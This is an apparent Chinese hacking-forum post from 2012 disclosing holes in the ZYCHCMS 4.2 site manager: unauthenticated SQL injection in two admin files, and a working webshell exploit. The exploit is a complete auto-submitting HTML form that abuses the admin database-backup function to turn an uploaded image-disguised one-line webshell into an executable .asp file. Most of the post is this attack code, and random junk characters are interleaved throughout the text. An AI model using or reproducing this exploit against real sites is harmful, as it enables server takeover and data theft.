: E$ T: c1 }; j) k+ O% i2 _
! |( Z4 N) Q) F+ d8 X t) }0 b) t- u5 A) A) x9 H+ q
E7 v/ E" \) [& ]5 L! R6 D影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
) K l5 p4 f0 p+ q- C/ E0 E2 W ①SQL注射漏洞) L p+ R8 ^2 W! u8 V& l. D# H7 E
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp# w) L+ Y6 ?, X2 R0 Z& A0 Y1 _
漏洞原因:未过滤. l. r* F# E e
漏洞代码:
# X8 F k% {& f& k5 C0 r 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
% P* b5 k0 L& ^; f6 l( l) F 修复方法:在文件开头加入代码- r6 _+ C% x+ O/ `/ Y
& R0 M0 }4 E# z
6 w3 b- g- M. s②后台拿WBSHELL i: t* q0 P* z; E3 ^
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。 s" `; E. C. H
这里在网上找了一个,改了下,将就着用。4 b/ [- U8 [' N! v! h2 M% b' j) W% u, ~
以下是代码本地提交代码: n+ p& u k. T5 C
/ U8 w3 o5 x- E. h0 h# ^# W
1 P y8 z `/ x* A$ S
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>/ L! C. Z/ A5 m# D I% J
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
1 x, P/ W! y) k: A( P5 C8 V) { <tr>
! E: M. ^* n% w9 q2 ~& V <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
2 @8 M- X T2 z/ v# V9 v, ~( f3 @% o </tr>
* k% f0 N+ G' a+ @# L4 F <tr>- [' v" `8 U3 c5 v' l. h
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
- L" @ y9 C( C' e0 D </span>
5 C3 S7 P" D. ]5 `6 l8 Z <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >2 N# g2 a2 Z* ^% o/ ~9 A! h3 f
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >) g( o+ v: d$ n5 Y3 `5 z
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
0 }. v( `: Q8 g1 c6 @( T <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d X4 V$ @5 a9 G; i: e
<div align=”left”>! ] a9 g( V9 B( E& M" ^, q
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />( f8 R6 q$ D: X9 Y: a
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
5 }& D: E4 o- i <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
+ o1 O. K! F% a7 X6 A; b </div></td>
* f, n+ V- r5 z0 E M$ i$ d8 Z9 p </tr>; l( O) @9 @$ x6 a8 C O0 c- [5 E7 t
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>3 ^: O2 _: a, J0 _# f- @9 M+ W4 i
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
$ W7 J* A1 W1 m: u <td class=”td”><div align=”left”>* o" \& r2 a/ @7 M$ p! R
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />( J( k5 _; L' E
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
/ J4 Q2 ^ Q% |& M4 f8 n* r </tr>
1 B! b+ L- O: k) `% \9 o1 I <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>. ^3 N% ?- N9 x( V) O2 m
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
. `$ _3 a& Z- Z. H& \% C <td class=”td”><div align=”left”>
9 z4 L3 M" b* a! m <input type=”submit” value=”确定备份” class=”btn”8 D* |: S2 n( m# ?
</div></td>5 Y7 S' z" _% f( i, v9 Y9 _
</tr># L0 O8 J; |! f9 x' P8 Q- c
</table></td></tr></form>
g7 o5 R/ w# y, J \ </table>: Z! T; F2 Z2 j' A- f* t
</td>9 L. F' i! p/ c# o
</tr>, L8 J7 {! P1 i/ J2 ^& t* U
</table>
' K# p, X% Q( h3 v0 J! W8 p& ` <script>
8 z& i! P4 ~0 ~, S/ b% A( ? document.all.add.submit();
. x a( X: C, r s2 @" U </script># ?0 k" \( ]5 N3 v4 s/ Y9 l
0 {2 g5 C% Z2 k+ m, ?* Z, U! ~7 w: ?" \# O: `! N$ [# }# X4 f
8 ^" M, e% F1 m. Q. W
8 c6 _& f3 t$ K" t) |" l* l2 h7 A: m6 @0 y6 @9 ?. Y: O( d
3 e [; f8 F) M6 {, i! @4 z
+ B3 _( i. v( k9 [; v* x, s" H, u
+ o8 p. A2 B5 B$ {
+ d7 l1 ]. c, a7 U* j$ r
+ H0 d' L8 q! D4 ?! e3 y
|
发表于 2012-9-10 21:09:51
收藏
支持
反对